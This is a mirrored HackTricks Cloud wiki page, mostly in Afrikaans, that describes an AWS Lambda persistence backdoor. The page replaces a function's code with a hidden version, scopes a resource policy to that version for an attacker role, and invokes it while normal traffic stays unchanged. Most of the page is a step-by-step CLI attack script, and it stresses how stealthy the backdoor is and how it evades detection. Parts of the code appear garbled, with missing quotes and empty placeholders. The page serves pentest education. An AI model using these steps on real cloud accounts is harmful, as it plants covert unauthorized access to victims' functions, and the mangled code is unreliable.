gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-29 22:20:33 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
26872ed37dd952ea2f25b83840a42689c62bdab4
hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-alias-version-policy-backdoor.md

4.6 KiB
Raw Blame History

AWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)

{{#include ../../../../banners/hacktricks-training.md}}

Opsomming

Skep 'n versteekte Lambda-weergawe met aanvallerslogika en scope 'n resource-gebaseerde beleid na daardie spesifieke weergawe (of alias) deur die --qualifier parameter in lambda add-permission te gebruik. Ken slegs lambda:InvokeFunction toe op arn:aws:lambda:REGION:ACCT:function:FN:VERSION aan 'n aanvaller-prinsipaal. Normale aanroepe via die funksienaam of primêre alias bly onaangeraak, terwyl die aanvaller die backdoored weergawe-ARN direk kan aanroep.

Dit is meer stealthy as om 'n Function URL bloot te stel en verander nie die primêre verkeer-alias nie.

Vereiste Permissies (aanvaller)

  • lambda:UpdateFunctionCode, lambda:UpdateFunctionConfiguration, lambda:PublishVersion, lambda:GetFunctionConfiguration
  • lambda:AddPermission (om 'n version-geskoorde resource-beleid by te voeg)
  • iam:CreateRole, iam:PutRolePolicy, iam:GetRole, sts:AssumeRole (om 'n aanvaller-prinsipaal te simuleer)

Aanvalstappe (CLI)

Publiseer versteekte weergawe, voeg qualifier-geskoorde permissie by, roep aan as aanvaller ```bash # Vars REGION=us-east-1 TARGET_FN=

[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., "main") stays on a clean version

aws lambda create-alias --function-name "$TARGET_FN" --name main --function-version --region "$REGION"

1) Build a small backdoor handler and publish as a new version

cat > bdoor.py <<PY import json, os, boto3

def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {"ht": True, "who": ident, "env": {"fn": os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code --function-name "$TARGET_FN" --zip-file fileb://bdoor.zip --region $REGION aws lambda update-function-configuration --function-name "$TARGET_FN" --handler bdoor.lambda_handler --region $REGION until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --region $REGION --query LastUpdateStatus --output text)" = "Successful" ]; do sleep 2; done VER=$(aws lambda publish-version --function-name "$TARGET_FN" --region $REGION --query Version --output text) VER_ARN=$(aws lambda get-function --function-name "$TARGET_FN:$VER" --region $REGION --query Configuration.FunctionArn --output text) echo "Published version: $VER ($VER_ARN)"

2) Create an attacker principal and allow only version invocation (same-account simulation)

ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role --role-name $ATTACK_ROLE_NAME --assume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { "Version": "2012-10-17", "Statement": [{ "Effect": "Allow", "Action": ["lambda:InvokeFunction"], "Resource": ["$VER_ARN"] }] } POL aws iam put-role-policy --role-name $ATTACK_ROLE_NAME --policy-name ht-invoke-version --policy-document file:///tmp/invoke-policy.json

Add resource-based policy scoped to the version (Qualifier)

aws lambda add-permission
--function-name "$TARGET_FN"
--qualifier "$VER"
--statement-id ht-version-backdoor
--action lambda:InvokeFunction
--principal arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME
--region $REGION

3) Assume the attacker role and invoke only the qualified version

ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity --query Account --output text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role --role-arn "$ATTACK_ROLE_ARN" --role-session-name htInvoke --query Credentials --output json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke --function-name "$VER_ARN" /tmp/ver-out.json --region $REGION >/dev/null cat /tmp/ver-out.json

4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role

aws lambda remove-permission --function-name "$TARGET_FN" --statement-id ht-version-backdoor --qualifier "$VER" --region $REGION || true

</details>

## Impak

- Verleen 'n stil agterdeur om 'n verborge weergawe van die funksie aan te roep sonder om die primêre alias te wysig of 'n Function URL bloot te stel.
- Beperk blootstelling tot slegs die gespesifiseerde weergawe/alias via die hulpbron-gebaseerde beleid `Qualifier`, wat die opsporingsoppervlak verminder terwyl dit betroubare aanroeping vir die aanvaller-prinsipaal behou.

{{#include ../../../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink